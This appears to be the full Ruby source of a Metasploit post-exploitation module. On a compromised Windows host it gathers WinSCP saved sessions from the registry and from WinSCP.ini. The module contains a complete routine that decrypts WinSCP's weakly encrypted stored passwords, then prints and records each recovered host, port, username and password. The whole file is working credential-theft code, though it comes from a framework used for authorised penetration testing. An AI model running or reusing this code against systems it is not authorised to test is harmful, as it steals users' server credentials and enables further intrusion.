metasploit-framework/modules/post/windows/gather/enum_winscp_pwds.rb

239 lines
6.8 KiB
Ruby

##
# $Id$
##
# post/windows/gather/enum_vnc_pw.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
require 'rex/parser/ini'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather WinSCP Saved Password Extraction',
'Description' => %q{ This module extracts weakly encrypted
saved passwords from WinSCP. It
searches for saved sessions in the
Windows Registry and the WinSCP.ini
file. It cannot decrypt passwords
if a master password is used},
'License' => MSF_LICENSE,
'Author' => [ 'TheLightCosine <thelightcosine@gmail.com>'],
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def get_reg
#Enumerate all the SID in HKEY_Users and see if any of them have WinSCP RegistryKeys.
regexists = 0
registry_enumkeys('HKU').each do |k|
masterpw = registry_getvaldata("HKU\\#{k}\\Software\\Martin Prikryl\\WinSCP 2\\Configuration\\Security", 'UseMasterPassword')
if masterpw == nil
#No WinSCP Keys here
next
end
regexists = 1
if masterpw == 1
#Master Password used to add AES256 encryption to stored password
print_status("User #{k} is using a Master Password, cannot recover passwords")
next
else
#Take a look at any saved sessions
savedpwds = 0
registry_enumkeys("HKU\\#{k}\\Software\\Martin Prikryl\\WinSCP 2\\Sessions").each do |session|
#Skip default settings entry
if session == "Default%20Settings"
next
end
password = registry_getvaldata("HKU\\#{k}\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\#{session}", 'Password')
if password == nil
#There is no password saved for this session, so we skip it
next
end
savedpwds = 1
portnum = registry_getvaldata("HKU\\#{k}\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\#{session}", 'PortNumber')
if portnum == nil
#If no explicit port number entry exists, it is set to default port of tcp22
portnum = 22
end
user = registry_getvaldata("HKU\\#{k}\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\#{session}", 'UserName')
host = registry_getvaldata("HKU\\#{k}\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\#{session}", 'HostName')
proto = registry_getvaldata("HKU\\#{k}\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\#{session}", 'FSProtocol')
#If no explicit protocol entry exists it is on sFTP with SCP backup. If it is 0 it is set to SCP.
if proto == nil or proto == 0
proto = "SCP"
else
proto = "FTP"
end
#Decrypt our password, and report on results
pass= decrypt_password(password, user+host)
print_status("Host: #{host} Port: #{portnum} Protocol: #{proto} Username: #{user} Password: #{pass}")
report_auth_info(
:host => host,
:port => portnum,
:sname => proto,
:user => user,
:pass => pass
)
end
if savedpwds == 0
print_status("No Saved Passwords found in the Session Registry Keys")
end
end
end
if regexists == 0
print_status("No WinSCP Registry Keys found!")
end
end
def get_ini(filename)
begin
#opens the WinSCP.ini file for reading and loads it into the MSF Ini Parser
iniexists = client.fs.file.stat(filename)
config = client.fs.file.new(filename,'r')
parse = config.read
print_status("Found WinSCP.ini file...")
ini=Rex::Parser::Ini.from_s(parse)
#if a Master Password is in use we give up
if ini['Configuration\\Security']['MasterPassword'] == '1'
print_status("Master Password Set, unable to recover saved passwords!")
return nil
end
#Runs through each group in the ini file looking for all of the Sessions
ini.each_key do |group|
groupkey='Sessions'
if group=~/#{groupkey}/
#See if we have a password saved in this sessions
if ini[group].has_key?('Password')
#If no explicit port number is defined, then it is the default tcp22
if ini[group].has_key?('PortNumber')
portnum = ini[group]['PortNumber']
else
portnum = 22
end
host= ini[group]['HostName']
user= ini[group]['UserName']
proto = ini[group]['FSProtocol']
#If no explicit protocol entry exists it is on sFTP with SCP backup. If it is 0 it is set to SCP.
if proto == nil or proto == 0
proto = "SCP"
else
proto = "FTP"
end
#Decrypt the password and report on all of the results
pass= decrypt_password(ini[group]['Password'], user+host)
print_status("Host: #{host} Port: #{portnum} Protocol: #{proto} Username: #{user} Password: #{pass}")
report_auth_info(
:host => host,
:port => portnum,
:sname => proto,
:user => user,
:pass => pass
)
end
end
end
rescue
print_status("WinSCP.ini file NOT found...")
end
end
def decrypt_next_char
pwalg_simple_magic = 0xA3
pwalg_simple_string = "0123456789ABCDEF"
#Decrypts the next charachter in the password sequence
if @password.length > 0
#Takes the first char from the encrypted password and finds its position in the pre-defined string, then left shifts the returned index by 4 bits
unpack1 = pwalg_simple_string.index(@password[0,1])
unpack1= unpack1 << 4
#Takes the second char from the encrypted password and finds its position in the pre-defined string
unpack2 = pwalg_simple_string.index(@password[1,1])
#Adds the two results, XORs against 0xA3, NOTs it and then ands it with 0xFF
result= ~((unpack1+unpack2) ^ pwalg_simple_magic) & 0xff
#Strips the first two chars off and returns our result
@password = @password[2,@password.length]
return result
end
end
def decrypt_password(pwd, key)
pwalg_simple_flag = 0xFF
@password = pwd
flag = decrypt_next_char()
if flag == pwalg_simple_flag
decrypt_next_char();
length = decrypt_next_char();
else
length = flag;
end
ldel = (decrypt_next_char())*2 ;
@password = @password[ldel,@password.length];
result="";
for ss in 0...length
result+=decrypt_next_char().chr
end
if flag == pwalg_simple_flag
result= result[key.length,result.length];
end
return result
end
def run
print_status("Looking for WinSCP.ini file storage...")
get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini')
print_status("Looking for Registry Storage...")
get_reg()
print_status("Done!")
end
end